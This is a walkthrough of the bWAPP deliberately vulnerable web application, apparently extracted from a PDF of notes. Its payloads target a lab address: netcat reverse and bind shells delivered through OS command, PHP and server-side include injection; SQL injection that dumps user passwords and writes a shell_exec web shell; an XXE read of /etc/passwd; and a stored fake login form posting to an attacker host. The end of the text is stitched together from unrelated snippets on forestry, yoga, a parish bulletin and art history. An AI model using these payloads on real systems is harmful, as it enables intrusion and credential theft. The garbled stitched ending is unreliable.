BWAPP - Sanjiv Kawa
bWAPP - Sanjiv KawaApril 2, 201510:37 AM/ A1 - Injection /HTML Injection - Reflected (GET)HTML Injection - Reflected (POST)HTML Injection - Reflected (Current URL)HTML Injection - Stored (Blog)iFrame InjectionLDAP Injection (Search)Mail Header Injection (SMTP)OS Command InjectionOS Command Injection - BlindPHP Code InjectionServer-Side Includes (SSI) InjectionSQL Injection (GET/Search)SQL Injection (GET/Select)SQL Injection (POST/Search)SQL Injection (POST/Select)SQL Injection (AJAX/JSON/jQuery)SQL Injection (CAPTCHA)SQL Injection (Login Form/Hero)SQL Injection (Login Form/User)SQL Injection (SQLite)SQL Injection (Drupal)SQL Injection - Stored (Blog)SQL Injection - Stored (SQLite)SQL Injection - Stored (User-Agent)SQL Injection - Stored (XML)SQL Injection - Blind - Boolean-BasedSQL Injection - Blind - Time-BasedSQL Injection - Blind (SQLite)SQL Injection - Blind (Web Services/SOAP)XML/XPath Injection (Login Form)XML/XPath Injection (Search)/ A2 - Broken Auth. & Session Mgmt. /Broken Authentication - CAPTCHA BypassingBroken Authentication - Forgotten FunctionBroken Authentication - Insecure Login FormsBroken Authentication - Logout ManagementBroken Authentication - Password AttacksBroken Authentication - Weak PasswordsSession Management - Administrative PortalsSession Management - Cookies (HTTPOnly)Session Management - Cookies (Secure)Session Management - Session ID in URLSession Management - Strong Sessions/ A3 - Cross-Site Scripting (XSS) /Cross-Site Scripting - Reflected (GET)Cross-Site Scripting - Reflected (POST)Cross-Site Scripting - Reflected (JSON)Cross-Site Scripting - Reflected (AJAX/JSON)Cross-Site Scripting - Reflected (AJAX/XML)bWAPP Page 1
Cross-Site Scripting - Reflected (AJAX/XML)Cross-Site Scripting - Reflected (Back Button)Cross-Site Scripting - Reflected (Custom Header)Cross-Site Scripting - Reflected (Eval)Cross-Site Scripting - Reflected (HREF)Cross-Site Scripting - Reflected (Login Form)Cross-Site Scripting - Reflected (phpMyAdmin)Cross-Site Scripting - Reflected (PHP SELF)Cross-Site Scripting - Reflected (Referer)Cross-Site Scripting - Reflected (User-Agent)Cross-Site Scripting - Stored (Blog)Cross-Site Scripting - Stored (Change Secret)Cross-Site Scripting - Stored (Cookies)Cross-Site Scripting - Stored (SQLiteManager)Cross-Site Scripting - Stored (User-Agent)/ A4 - Insecure Direct Object References /Insecure DOR (Change Secret)Insecure DOR (Reset Secret)Insecure DOR (Order Tickets)/ A5 - Security Misconfiguration /Arbitrary File Access (Samba)Cross-Domain Policy File (Flash)Cross-Origin Resource Sharing (AJAX)Cross-Site Tracing (XST)Denial-of-Service (Large Chunk Size)Denial-of-Service (Slow HTTP DoS)Denial-of-Service (SSL-Exhaustion)Denial-of-Service (XML Bomb)Insecure FTP ConfigurationInsecure SNMP ConfigurationInsecure WebDAV ConfigurationLocal Privilege Escalation (sendpage)Local Privilege Escalation (udev)Man-in-the-Middle Attack (HTTP)Man-in-the-Middle Attack (SMTP)Old/Backup & Unreferenced FilesRobots File/ A6 - Sensitive Data Exposure /Base64 Encoding (Secret)BEAST/CRIME/BREACH AttacksClear Text HTTP (Credentials)Heartbleed VulnerabilityHost Header Attack (Reset Poisoning)HTML5 Web Storage (Secret)POODLE VulnerabilitySSL 2.0 Deprecated ProtocolText Files (Accounts)/ A7 - Missing Functional Level Access Control /Directory Traversal - DirectoriesDirectory Traversal - FilesHost Header Attack (Cache Poisoning)Host Header Attack (Reset Poisoning)Local File Inclusion (SQLiteManager)Remote & Local File Inclusion (RFI/LFI)bWAPP Page 2
Remote & Local File Inclusion (RFI/LFI)Restrict Device AccessRestrict Folder AccessServer Side Request Forgery (SSRF)XML External Entity Attacks (XXE)/ A8 - Cross-Site Request Forgery (CSRF) /Cross-Site Request Forgery (Change Password)Cross-Site Request Forgery (Change Secret)Cross-Site Request Forgery (Transfer Amount)/ A9 - Using Known Vulnerable Components /Buffer Overflow (Local)Buffer Overflow (Remote)Drupal SQL Injection (Drupageddon)Heartbleed VulnerabilityPHP CGI Remote Code ExecutionPHP Eval FunctionphpMyAdmin BBCode Tag XSSShellshock Vulnerability (CGI)SQLiteManager Local File InclusionSQLiteManager PHP Code InjectionSQLiteManager XSS/ A10 - Unvalidated Redirects & Forwards /Unvalidated Redirects & Forwards (1)Unvalidated Redirects & Forwards (2)/ Other bugs. /ClickJacking (Movie Tickets)Client-Side Validation (Password)HTTP Parameter PollutionHTTP Response SplittingHTTP Verb TamperingInformation Disclosure - FaviconInformation Disclosure - HeadersInformation Disclosure - PHP versionInformation Disclosure - Robots FileInsecure iFrame (Login Form)Unrestricted File Upload--------------------------- Extras -------------------------A.I.M. - No-authentication ModeClient Access Policy FileCross-Domain Policy FileEvil 666 Fuzzing PageManual Intervention Required!Unprotected Admin PortalWe Steal Secrets. (html)We Steal Secrets. (plain)WSDL File (Web Services/SOAP)bWAPP Page 3
A1: InjectionMarch 31, 20159:03 AMAreas with an asterix next to them have not been listed in this walkthough.HTML Injection - Reflected (GET)HTML Injection - Reflected (POST)HTML Injection - Reflected (Current URL)HTML Injection - Stored (Blog)iFrame InjectionOS Command InjectionOS Command Injection - BlindPHP Code InjectionServer-Side Includes (SSI) InjectionSQL Injection (GET/Search)SQL Injection (GET/Select)SQL Injection (POST/Search)SQL Injection (POST/Select)SQL Injection (Login Form/Hero)SQL Injection (SQLite)SQL Injection (Drupal)SQL Injection - Stored (Blog)SQL Injection - Stored (SQLite)SQL Injection - Stored (User-Agent)SQL Injection - Blind - Boolean-BasedSQL Injection - Blind - Time-BasedXML/XPath Injection (Login Form)*LDAP Injection (Search)*Mail Header Injection (SMTP)*SQL Injection (AJAX/JSON/jQuery)*SQL Injection (CAPTCHA)*SQL Injection (Login Form/User)*SQL Injection - Stored (XML)*SQL Injection - Blind (SQLite)*SQL Injection - Blind (Web Services/SOAP)*XML/XPath Injection (Search)bWAPP Page 4
HTML Injection - Reflected (GET)March 31, 20159:03 AM h2 HTML Injection - Reflected (GET) /h2 http://192.168.254.131/bWAPP/htmli get.php?firstname h1 a href "http://www.google.com" Click Me! /a /h1 &lastname h2 blah /h2 &form submitbWAPP Page 5
HTML Injection - Reflected (POST)March 31, 20159:08 AMbWAPP Page 6
firstname h1 a href "http://www.google.com" Click Me! /a /h1 &lastname h2 blah /h2 &form submitbWAPP Page 7
HTML Injection - Reflected (URL)March 31, 20159:11 AMbWAPP Page 8
bWAPP Page 9
HTML Injection - Stored (Blog)March 31, 20159:16 AM div class "code" iframe SRC "http://attackerIP/blah" height "0" width "0" /iframe /div div class "code" test /div bWAPP Page 10
div class "code" test /div div style "position: absolute; left: 0px; top: 0px; width: 800px; height: 600px; z-index: 1000;background-color:white;" Session Expired, Please Login: br form name "login" action "http://attackerIP/lol.htm" table tr td Username: /td td input type "text" name "uname"/ /td /tr tr td Password: /td td input type "password" name "pw"/ /td /tr /table input type "submit" value "Login"/ /form /div bWAPP Page 11
bWAPP Page 12
iFrame InjectionMarch 31, 20159:42 l http://www.hello.com/&ParamWidth 500&ParamHeight 500bWAPP Page 13
bWAPP Page 14
OS Command InjectionMarch 31, 201510:47 AMwww.nsa.gov && nc -vn 192.168.254.128 4444 -e /bin/bashbWAPP Page 15
; whoamibWAPP Page 16
OS Command Injection (Blind)March 31, 201511:07 AMbWAPP Page 17
192.168.254.128 && nc -vn 192.168.254.128 4444 -e nd-os-command-injection-attacks.htmlbWAPP Page 18
PHP Code InjectionMarch 31, 201511:29 AMbWAPP Page 19
message 1; phpinfo()bWAPP Page 20
bWAPP Page 21
phpi.php?message ""; system('nc -lvp 1234 -e /bin/bash')bWAPP Page 22
Server Side Include (SSI) InjectionMarch 31, 201511:50 AM !--#exec cmd "id" -- !--#exec cmd "cat /etc/passwd" -- bWAPP Page 23
connect to me on port 8888! !--#exec cmd "nc -lvp 8888 -e /bin/bash" -- bWAPP Page 24
SQLi (GET/Search)March 31, 201511:53 AMbWAPP Page 25
bWAPP Page 26
sqli 1.php?title '&action searchbWAPP Page 27
sqli 1.php?title iron' or 1 1#&action searchbWAPP Page 28
sqli 1.php?title validEntry' or 1 2#&action searchsqli 1.php?title iron' union select 1,2,3,4,5,6,7 #&action searchbWAPP Page 29
sqli 1.php?title iron' union select 1,user(),@@version,4,5,6,7 #&action searchiron' union select 1,login,password,email,5,6,7 from users #sqli 1.php?title iron' union select 1," ?php echo shell exec( GET['cmd'])? ",3,4,5,6,7 into OUTFILE'/var/www/bWAPP/popped.php' #&action searchbWAPP Page 30
Select * from movies where title like 'iron'bWAPP Page 31
SQLi (GET/Select)March 31, 201512:35 PMsqli 2.php?movie 1 and 1 2#&action gobWAPP Page 32
sqli 2.php?movie 1 union select 1,2,3,4,5,6#&action gosqli 2.php?movie 1 union select 1,2,3,4,5,6,7#&action gobWAPP Page 33
sqli 2.php?movie 1337 union select 1,2,3,4,5,6,7#&action gosqli 2.php?movie 1337 union select 1,login,3,email,password,6,7 from users#&action gobWAPP Page 34
SQLi (POST/Search)March 31, 20151:07 PMbWAPP Page 35
bWAPP Page 36
bWAPP Page 37
bWAPP Page 38
SQLi (POST/Select)March 31, 20151:06 PMbWAPP Page 39
SQLi (Login Form/Hero)March 31, 20152:48 PM'bWAPP Page 40
login ' or 1 1#&password &form submitbWAPP Page 41
bWAPP Page 42
SQLi Stored (Blog)March 31, 20153:34 PMbWAPP Page 43
test','test')#bWAPP Page 44
bWAPP Page 45
canary1','canary2')#bWAPP Page 46
canary1',(select password from mysql.user where user 'root' limit 0,1))#bWAPP Page 47
canary1',(select version()))#canary1',(select user()))#bWAPP Page 48
SQLi Stored (User-Agent)March 31, 20153:56 PMbWAPP Page 49
bWAPP Page 50
bWAPP Page 51
SQLi Blind (Boolean Based)April 1, 20159:31 AMThis can be leveraged in conjunction with the substring function to identify table names based ontrue/false responsesbWAPP Page 52
SQLi Blind (Time Based)April 1, 20159:35 AMtest'-IF(MID(VERSION(),1,1) '5', SLEEP(5), 0)#bWAPP Page 53
XML/XPATH Injection (Login Form)April 1, 201510:14 AMIntercept responseshttp://pastebin.com/index/uT6zQGVx login REQUEST["login"]; login xmli( login); password REQUEST["password"]; password xmli( password);// Loads the XML file xml simplexml load file("passwords/heroes.xml");// XPath search result xml- xpath("/heroes/hero[login '" . login . "' and password '" . password . "']");[login '" . login . "' and password '" . password . "'][login '' and password ''][login 'whatever'' and password ''][login 'whatever' or 1 1' and password '']bWAPP Page 54
[login 'whatever' or 1 1' and password ''][login 'whatever' or 1 1 or '' and password '']whatever' or 1 1 or 'bWAPP Page 55
A2: Broken AuthenticationApril 1, 20153:24 PMAreas with an asterix next to them have not been listed in this walkthough.Broken Authentication - Insecure Login FormsBroken Authentication - Logout ManagementSession Management - Administrative Portals*Broken Authentication - CAPTCHA Bypassing*Broken Authentication - Forgotten Function*Broken Authentication - Password Attacks*Broken Authentication - Weak Passwords*Session Management - Cookies (HTTPOnly)*Session Management - Cookies (Secure)*Session Management - Session ID in URL*Session Management - Strong SessionsbWAPP Page 56
BA - Insecure Login FormApril 1, 20153:25 PMbWAPP Page 57
BA - Logout ManagementApril 1, 20153:26 PMbWAPP Page 58
BA - Session ManagementApril 1, 20153:31 PMbWAPP Page 59
bWAPP Page 60
A4: Insecure Direct Object ReferencesApril 1, 20153:46 PMAreas with an asterix next to them have not been listed in this walkthough.Insecure DOR (Change Secret)Insecure DOR (Order Tickets)*Insecure DOR (Reset Secret)bWAPP Page 61
Insecure Direct Object Reference (Change Secret)April 1, 20153:42 PMBee can be changed to bobbWAPP Page 62
bWAPP Page 63
Insecure Direct Object Reference (Order Ticket)April 1, 20153:51 PMbWAPP Page 64
bWAPP Page 65
A6: Sensitive Data ExposureApril 2, 20159:15 AMAreas with an asterix next to them have not been listed in this walkthough.Base64 Encoding (Secret)HTML5 Web Storage (Secret)*BEAST/CRIME/BREACH Attacks*Clear Text HTTP (Credentials)*Heartbleed Vulnerability*Host Header Attack (Reset Poisoning)*POODLE Vulnerability*SSL 2.0 Deprecated Protocol*Text Files (Accounts)bWAPP Page 66
Base64 EncodingApril 2, 20159:15 AMbWAPP Page 67
HTML5 Web StorageApril 2, 20159:16 AMbWAPP Page 68
bWAPP Page 69
A7: Missing Functional Level Access ControlApril 1, 20154:06 PMAreas with an asterix next to them have not been listed in this walkthough.Directory Traversal - FilesHost Header Attack (Cache Poisoning)Remote & Local File Inclusion (RFI/LFI)Restrict Device AccessXML External Entity Attacks (XXE)*Directory Traversal - Directories*Host Header Attack (Reset Poisoning)*Local File Inclusion (SQLiteManager)*Restrict Folder Access*Server Side Request Forgery (SSRF)bWAPP Page 70
Directory Traversal (Directories)April 1, 20154:07 PMbWAPP Page 71
bWAPP Page 72
Directory Traversal (Files)Wednesday, April 1, 20157:48 PMbWAPP Page 73
bWAPP Page 74
Host Header Attack (Cache Poisoning)Wednesday, April 1, 20158:02 PMbWAPP Page 75
bWAPP Page 76
bWAPP Page 77
bWAPP Page 78
bWAPP Page 79
Remote and Local File InclusionWednesday, April 1, 20158:27 PMbWAPP Page 80
bWAPP Page 81
bWAPP Page 82
bWAPP Page 83
bWAPP Page 84
Restrict Device AccessWednesday, April 1, 20158:38 PMMozilla/5.0(iPhone;U;CPUiPhoneOS4 o)Version/4.0.5Mobile/8A293Safari/6531.22.7bWAPP Page 85
bWAPP Page 86
XML External Entity Attacks (XXE)April 2, 20158:24 AMbWAPP Page 87
?xml version "1.0" encoding "utf-8"? !DOCTYPE root [ !ENTITY popped SYSTEM "http://192.168.254.131/bWAPP/robots.txt" ] reset login &popped; /login secret Any bugs? /secret /reset bWAPP Page 88
?xml version "1.0" encoding "utf-8"? !DOCTYPE root [ !ENTITY popped SYSTEM "file:///etc/passwd" ] reset login &popped; /login secret Any bugs? /secret /reset bWAPP Page 89
bWAPP Page 90
Extras: PHP Eval()April 2, 20151:38 securety.net/?p 705bWAPP Page 91
Broken Authentication - CAPTCHA Bypassing Broken Authentication - Forgotten Function Broken Authentication - Insecure Login Forms Broken Authentication - Logout Management Broken Authentication - Password Attacks Broken Authentication - Weak Passwords Session Management - Admin
HUMAN ENVIRONMENT Final Environmental Impact Statement 4-4 The Petition Area is located within the 'ili (small land division) of Kawa'ewa'e and Kalokoai. Kawa'ewa'e is the name of an important heiau located in the Petition Area while Kalokoai translates to "the food pond." The high chief 'Olopana was said to have erected Kawa .
Page 2 St. Florian Parish All Souls Day MASSES FOR THE WEEK Weekend, November 1 & 2 . 7:30AM Daniel Sciacca Family 4:00 PM Evelyn Twardosz Dolores Waicunas Sunday. November 9 . Edward Kawa, Larry Kawa, Ron Keene, Karen Kil, Bob Konecek, Martha Kowalkowski, Helen Larson, John Larson, Beth Lasseter, Thomas J. Lohr, Katharina
Made Easy A Guide to Applying the Kawa Model in Occupational Therapy Practice (2nd edition) . We spend a lifetime learning how to do things that are essential for the survival of our selves, families, communities or for
Personal journeys of recovery: Exploring the experiences of mental health service users engaging with the Kawa ‘River’ model. A thesis submitted for the degree of Doctor of Philosophy by Kee Hean Lim College of Health
ã Sanjiv Chaturvedi, 2020 www.divine-yoga.com Page 1 sanjiv@divine-yoga.com Prana - The Universal Life Force Why do we feel better when we practice yoga? Life transforming nature of yoga, to gain physical and mental benefits, has come to be acknowledged by people across numerous nations, crossing cultural and religious boarders.
web applications Web apps are an attractive target for cyber criminality, . Open source PHP application Backend MySQL database Hosted on Linux/Windows Apache/IIS Supported on WAMP or XAMPP . . Lighttpd, Nginx, MySQL and PHP installed Several PHP extensions installed (LDAP, SQLite, ) Vulnerable Bash, Drupal, OpenSSL and PHP-CGI .
upaya perbaikan tata kelola kehutanan, Pemerintah Indonesia menargetkan pengukuhan kawa-san hutan selesai dilakukan pada tahun 2015. Pengukuhan kawasan hutan merupakan cara untuk membentuk hutan tetap yang legal dan legitimate. Untuk mencapai tujuan itu, perbaikan kerangka regulasi adalah pra-syarat penting. Namun, sebelum-nya diperlukan kaji .
1550-1950, which she curated with Anne Sutherland Harris for the Los Angeles County Museum of Art; the show was accompanied by the catalogue of the same title co-authored by both scholars. Linda Nochlin has written numerous books and articles focusing attention on social and political issues revealed in the work of artists, both male and female, from the modernist period to the present day .
